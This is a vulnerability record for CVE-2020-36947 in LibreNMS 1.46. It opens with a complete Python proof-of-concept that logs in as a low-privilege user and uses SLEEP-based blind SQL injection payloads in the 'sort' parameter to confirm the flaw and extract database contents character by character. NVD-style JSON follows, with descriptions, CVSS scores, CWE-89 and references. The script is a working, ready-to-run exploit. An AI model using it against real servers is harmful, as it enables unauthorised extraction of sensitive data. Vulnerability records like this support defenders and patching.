CVE-2020-36947

import requests import time # CVE-2020-36947 PoC - Time-based Blind SQL Injection in LibreNMS MAC accounting graph # Target: LibreNMS 1.46 # Endpoint: /ajax_table.php?device=[DEVICE_ID]&type=macaccounting&sort=[SQL_PAYLOAD] TARGET_URL = "http://target-server/ajax_table.php" LOGIN_URL = "http://target-server/login" # Authentication credentials (low privilege user required) USERNAME = "attacker" PASSWORD = "password" DEVICE_ID = "1" # Target device ID def login(): """Login to LibreNMS and get session cookie""" session = requests.Session() login_data = { 'username': USERNAME, 'password': PASSWORD } response = session.post(LOGIN_URL, data=login_data) if 'auth' in response.cookies.get_dict(): return session return None def sql_injection_test(session): """Test for SQL injection vulnerability with time-based delay""" # Basic time-based SQL injection test # If vulnerable, this should cause a 5 second delay payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))s1) AND '1'='1" params = { 'device': DEVICE_ID, 'type': 'macaccounting', 'sort': payload } start_time = time.time() response = session.get(TARGET_URL, params=params) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] SQL Injection Confirmed! Response time: {elapsed}s") return True else: print(f"[-] No SQL injection detected. Response time: {elapsed}s") return False def extract_data(session, sql_query): """Extract data using time-based blind SQL injection""" # Construct time-based blind SQL injection payload # Extracts first character of the query result payload = f"1' AND (SELECT CASE WHEN ASCII(SUBSTRING(({sql_query}),1,1))>64 THEN SLEEP(2) ELSE 0 END) AND '1'='1" params = { 'device': DEVICE_ID, 'type': 'macaccounting', 'sort': payload } start_time = time.time() session.get(TARGET_URL, params=params) elapsed = time.time() - start_time return elapsed >= 2 def brute_force_extract(session, sql_query, max_length=50): """Brute force extract data character by character""" result = "" for pos in range(1, max_length + 1): for ascii_val in range(32, 127): char = chr(ascii_val) payload = f"1' AND (SELECT CASE WHEN ASCII(SUBSTRING(({sql_query}),{pos},1))={ascii_val} THEN SLEEP(2) ELSE 0 END) AND '1'='1" params = { 'device': DEVICE_ID, 'type': 'macaccounting', 'sort': payload } start_time = time.time() session.get(TARGET_URL, params=params) elapsed = time.time() - start_time if elapsed >= 2: result += char print(f"[*] Position {pos}: {result}") break return result if __name__ == "__main__": print("[*] CVE-2020-36947 LibreNMS SQL Injection PoC") session = login() if session: print("[+] Login successful") if sql_injection_test(session): print("[+] Extracting database user...") user = brute_force_extract(session, "SELECT user()", 30) print(f"[+] Database User: {user}") else: print("[-] Login failed")

{"cve": {"id": "CVE-2020-36947", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.040", "lastModified": "2026-02-02T19:48:55.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS 1.46 contains an authenticated SQL injection vulnerability in the MAC accounting graph endpoint that allows remote attackers to extract database information. Attackers can exploit the vulnerability by manipulating the 'sort' parameter with crafted SQL injection techniques to retrieve sensitive database contents through time-based blind SQL injection."}, {"lang": "es", "value": "LibreNMS 1.46 contiene una vulnerabilidad de inyección SQL autenticada en el endpoint de gráfico de contabilidad MAC que permite a atacantes remotos extraer información de la base de datos. Los atacantes pueden explotar la vulnerabilidad manipulando el parámetro 'sort' con técnicas de inyección SQL elaboradas para recuperar contenido sensible de la base de datos a través de inyección SQL ciega basada en tiempo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:1.46:*:*:*:*:*:*:*", "matchCriteriaId": "160112A5-16AF-441D-BE77-C6F01F90DAD0"}]}]}], "references": [{"url": "https://community.librenms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/librenms/librenms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49246", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.librenms.org", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/librenms-mac-accounting-graph-authenticated-sql-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://community.librenms.org/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}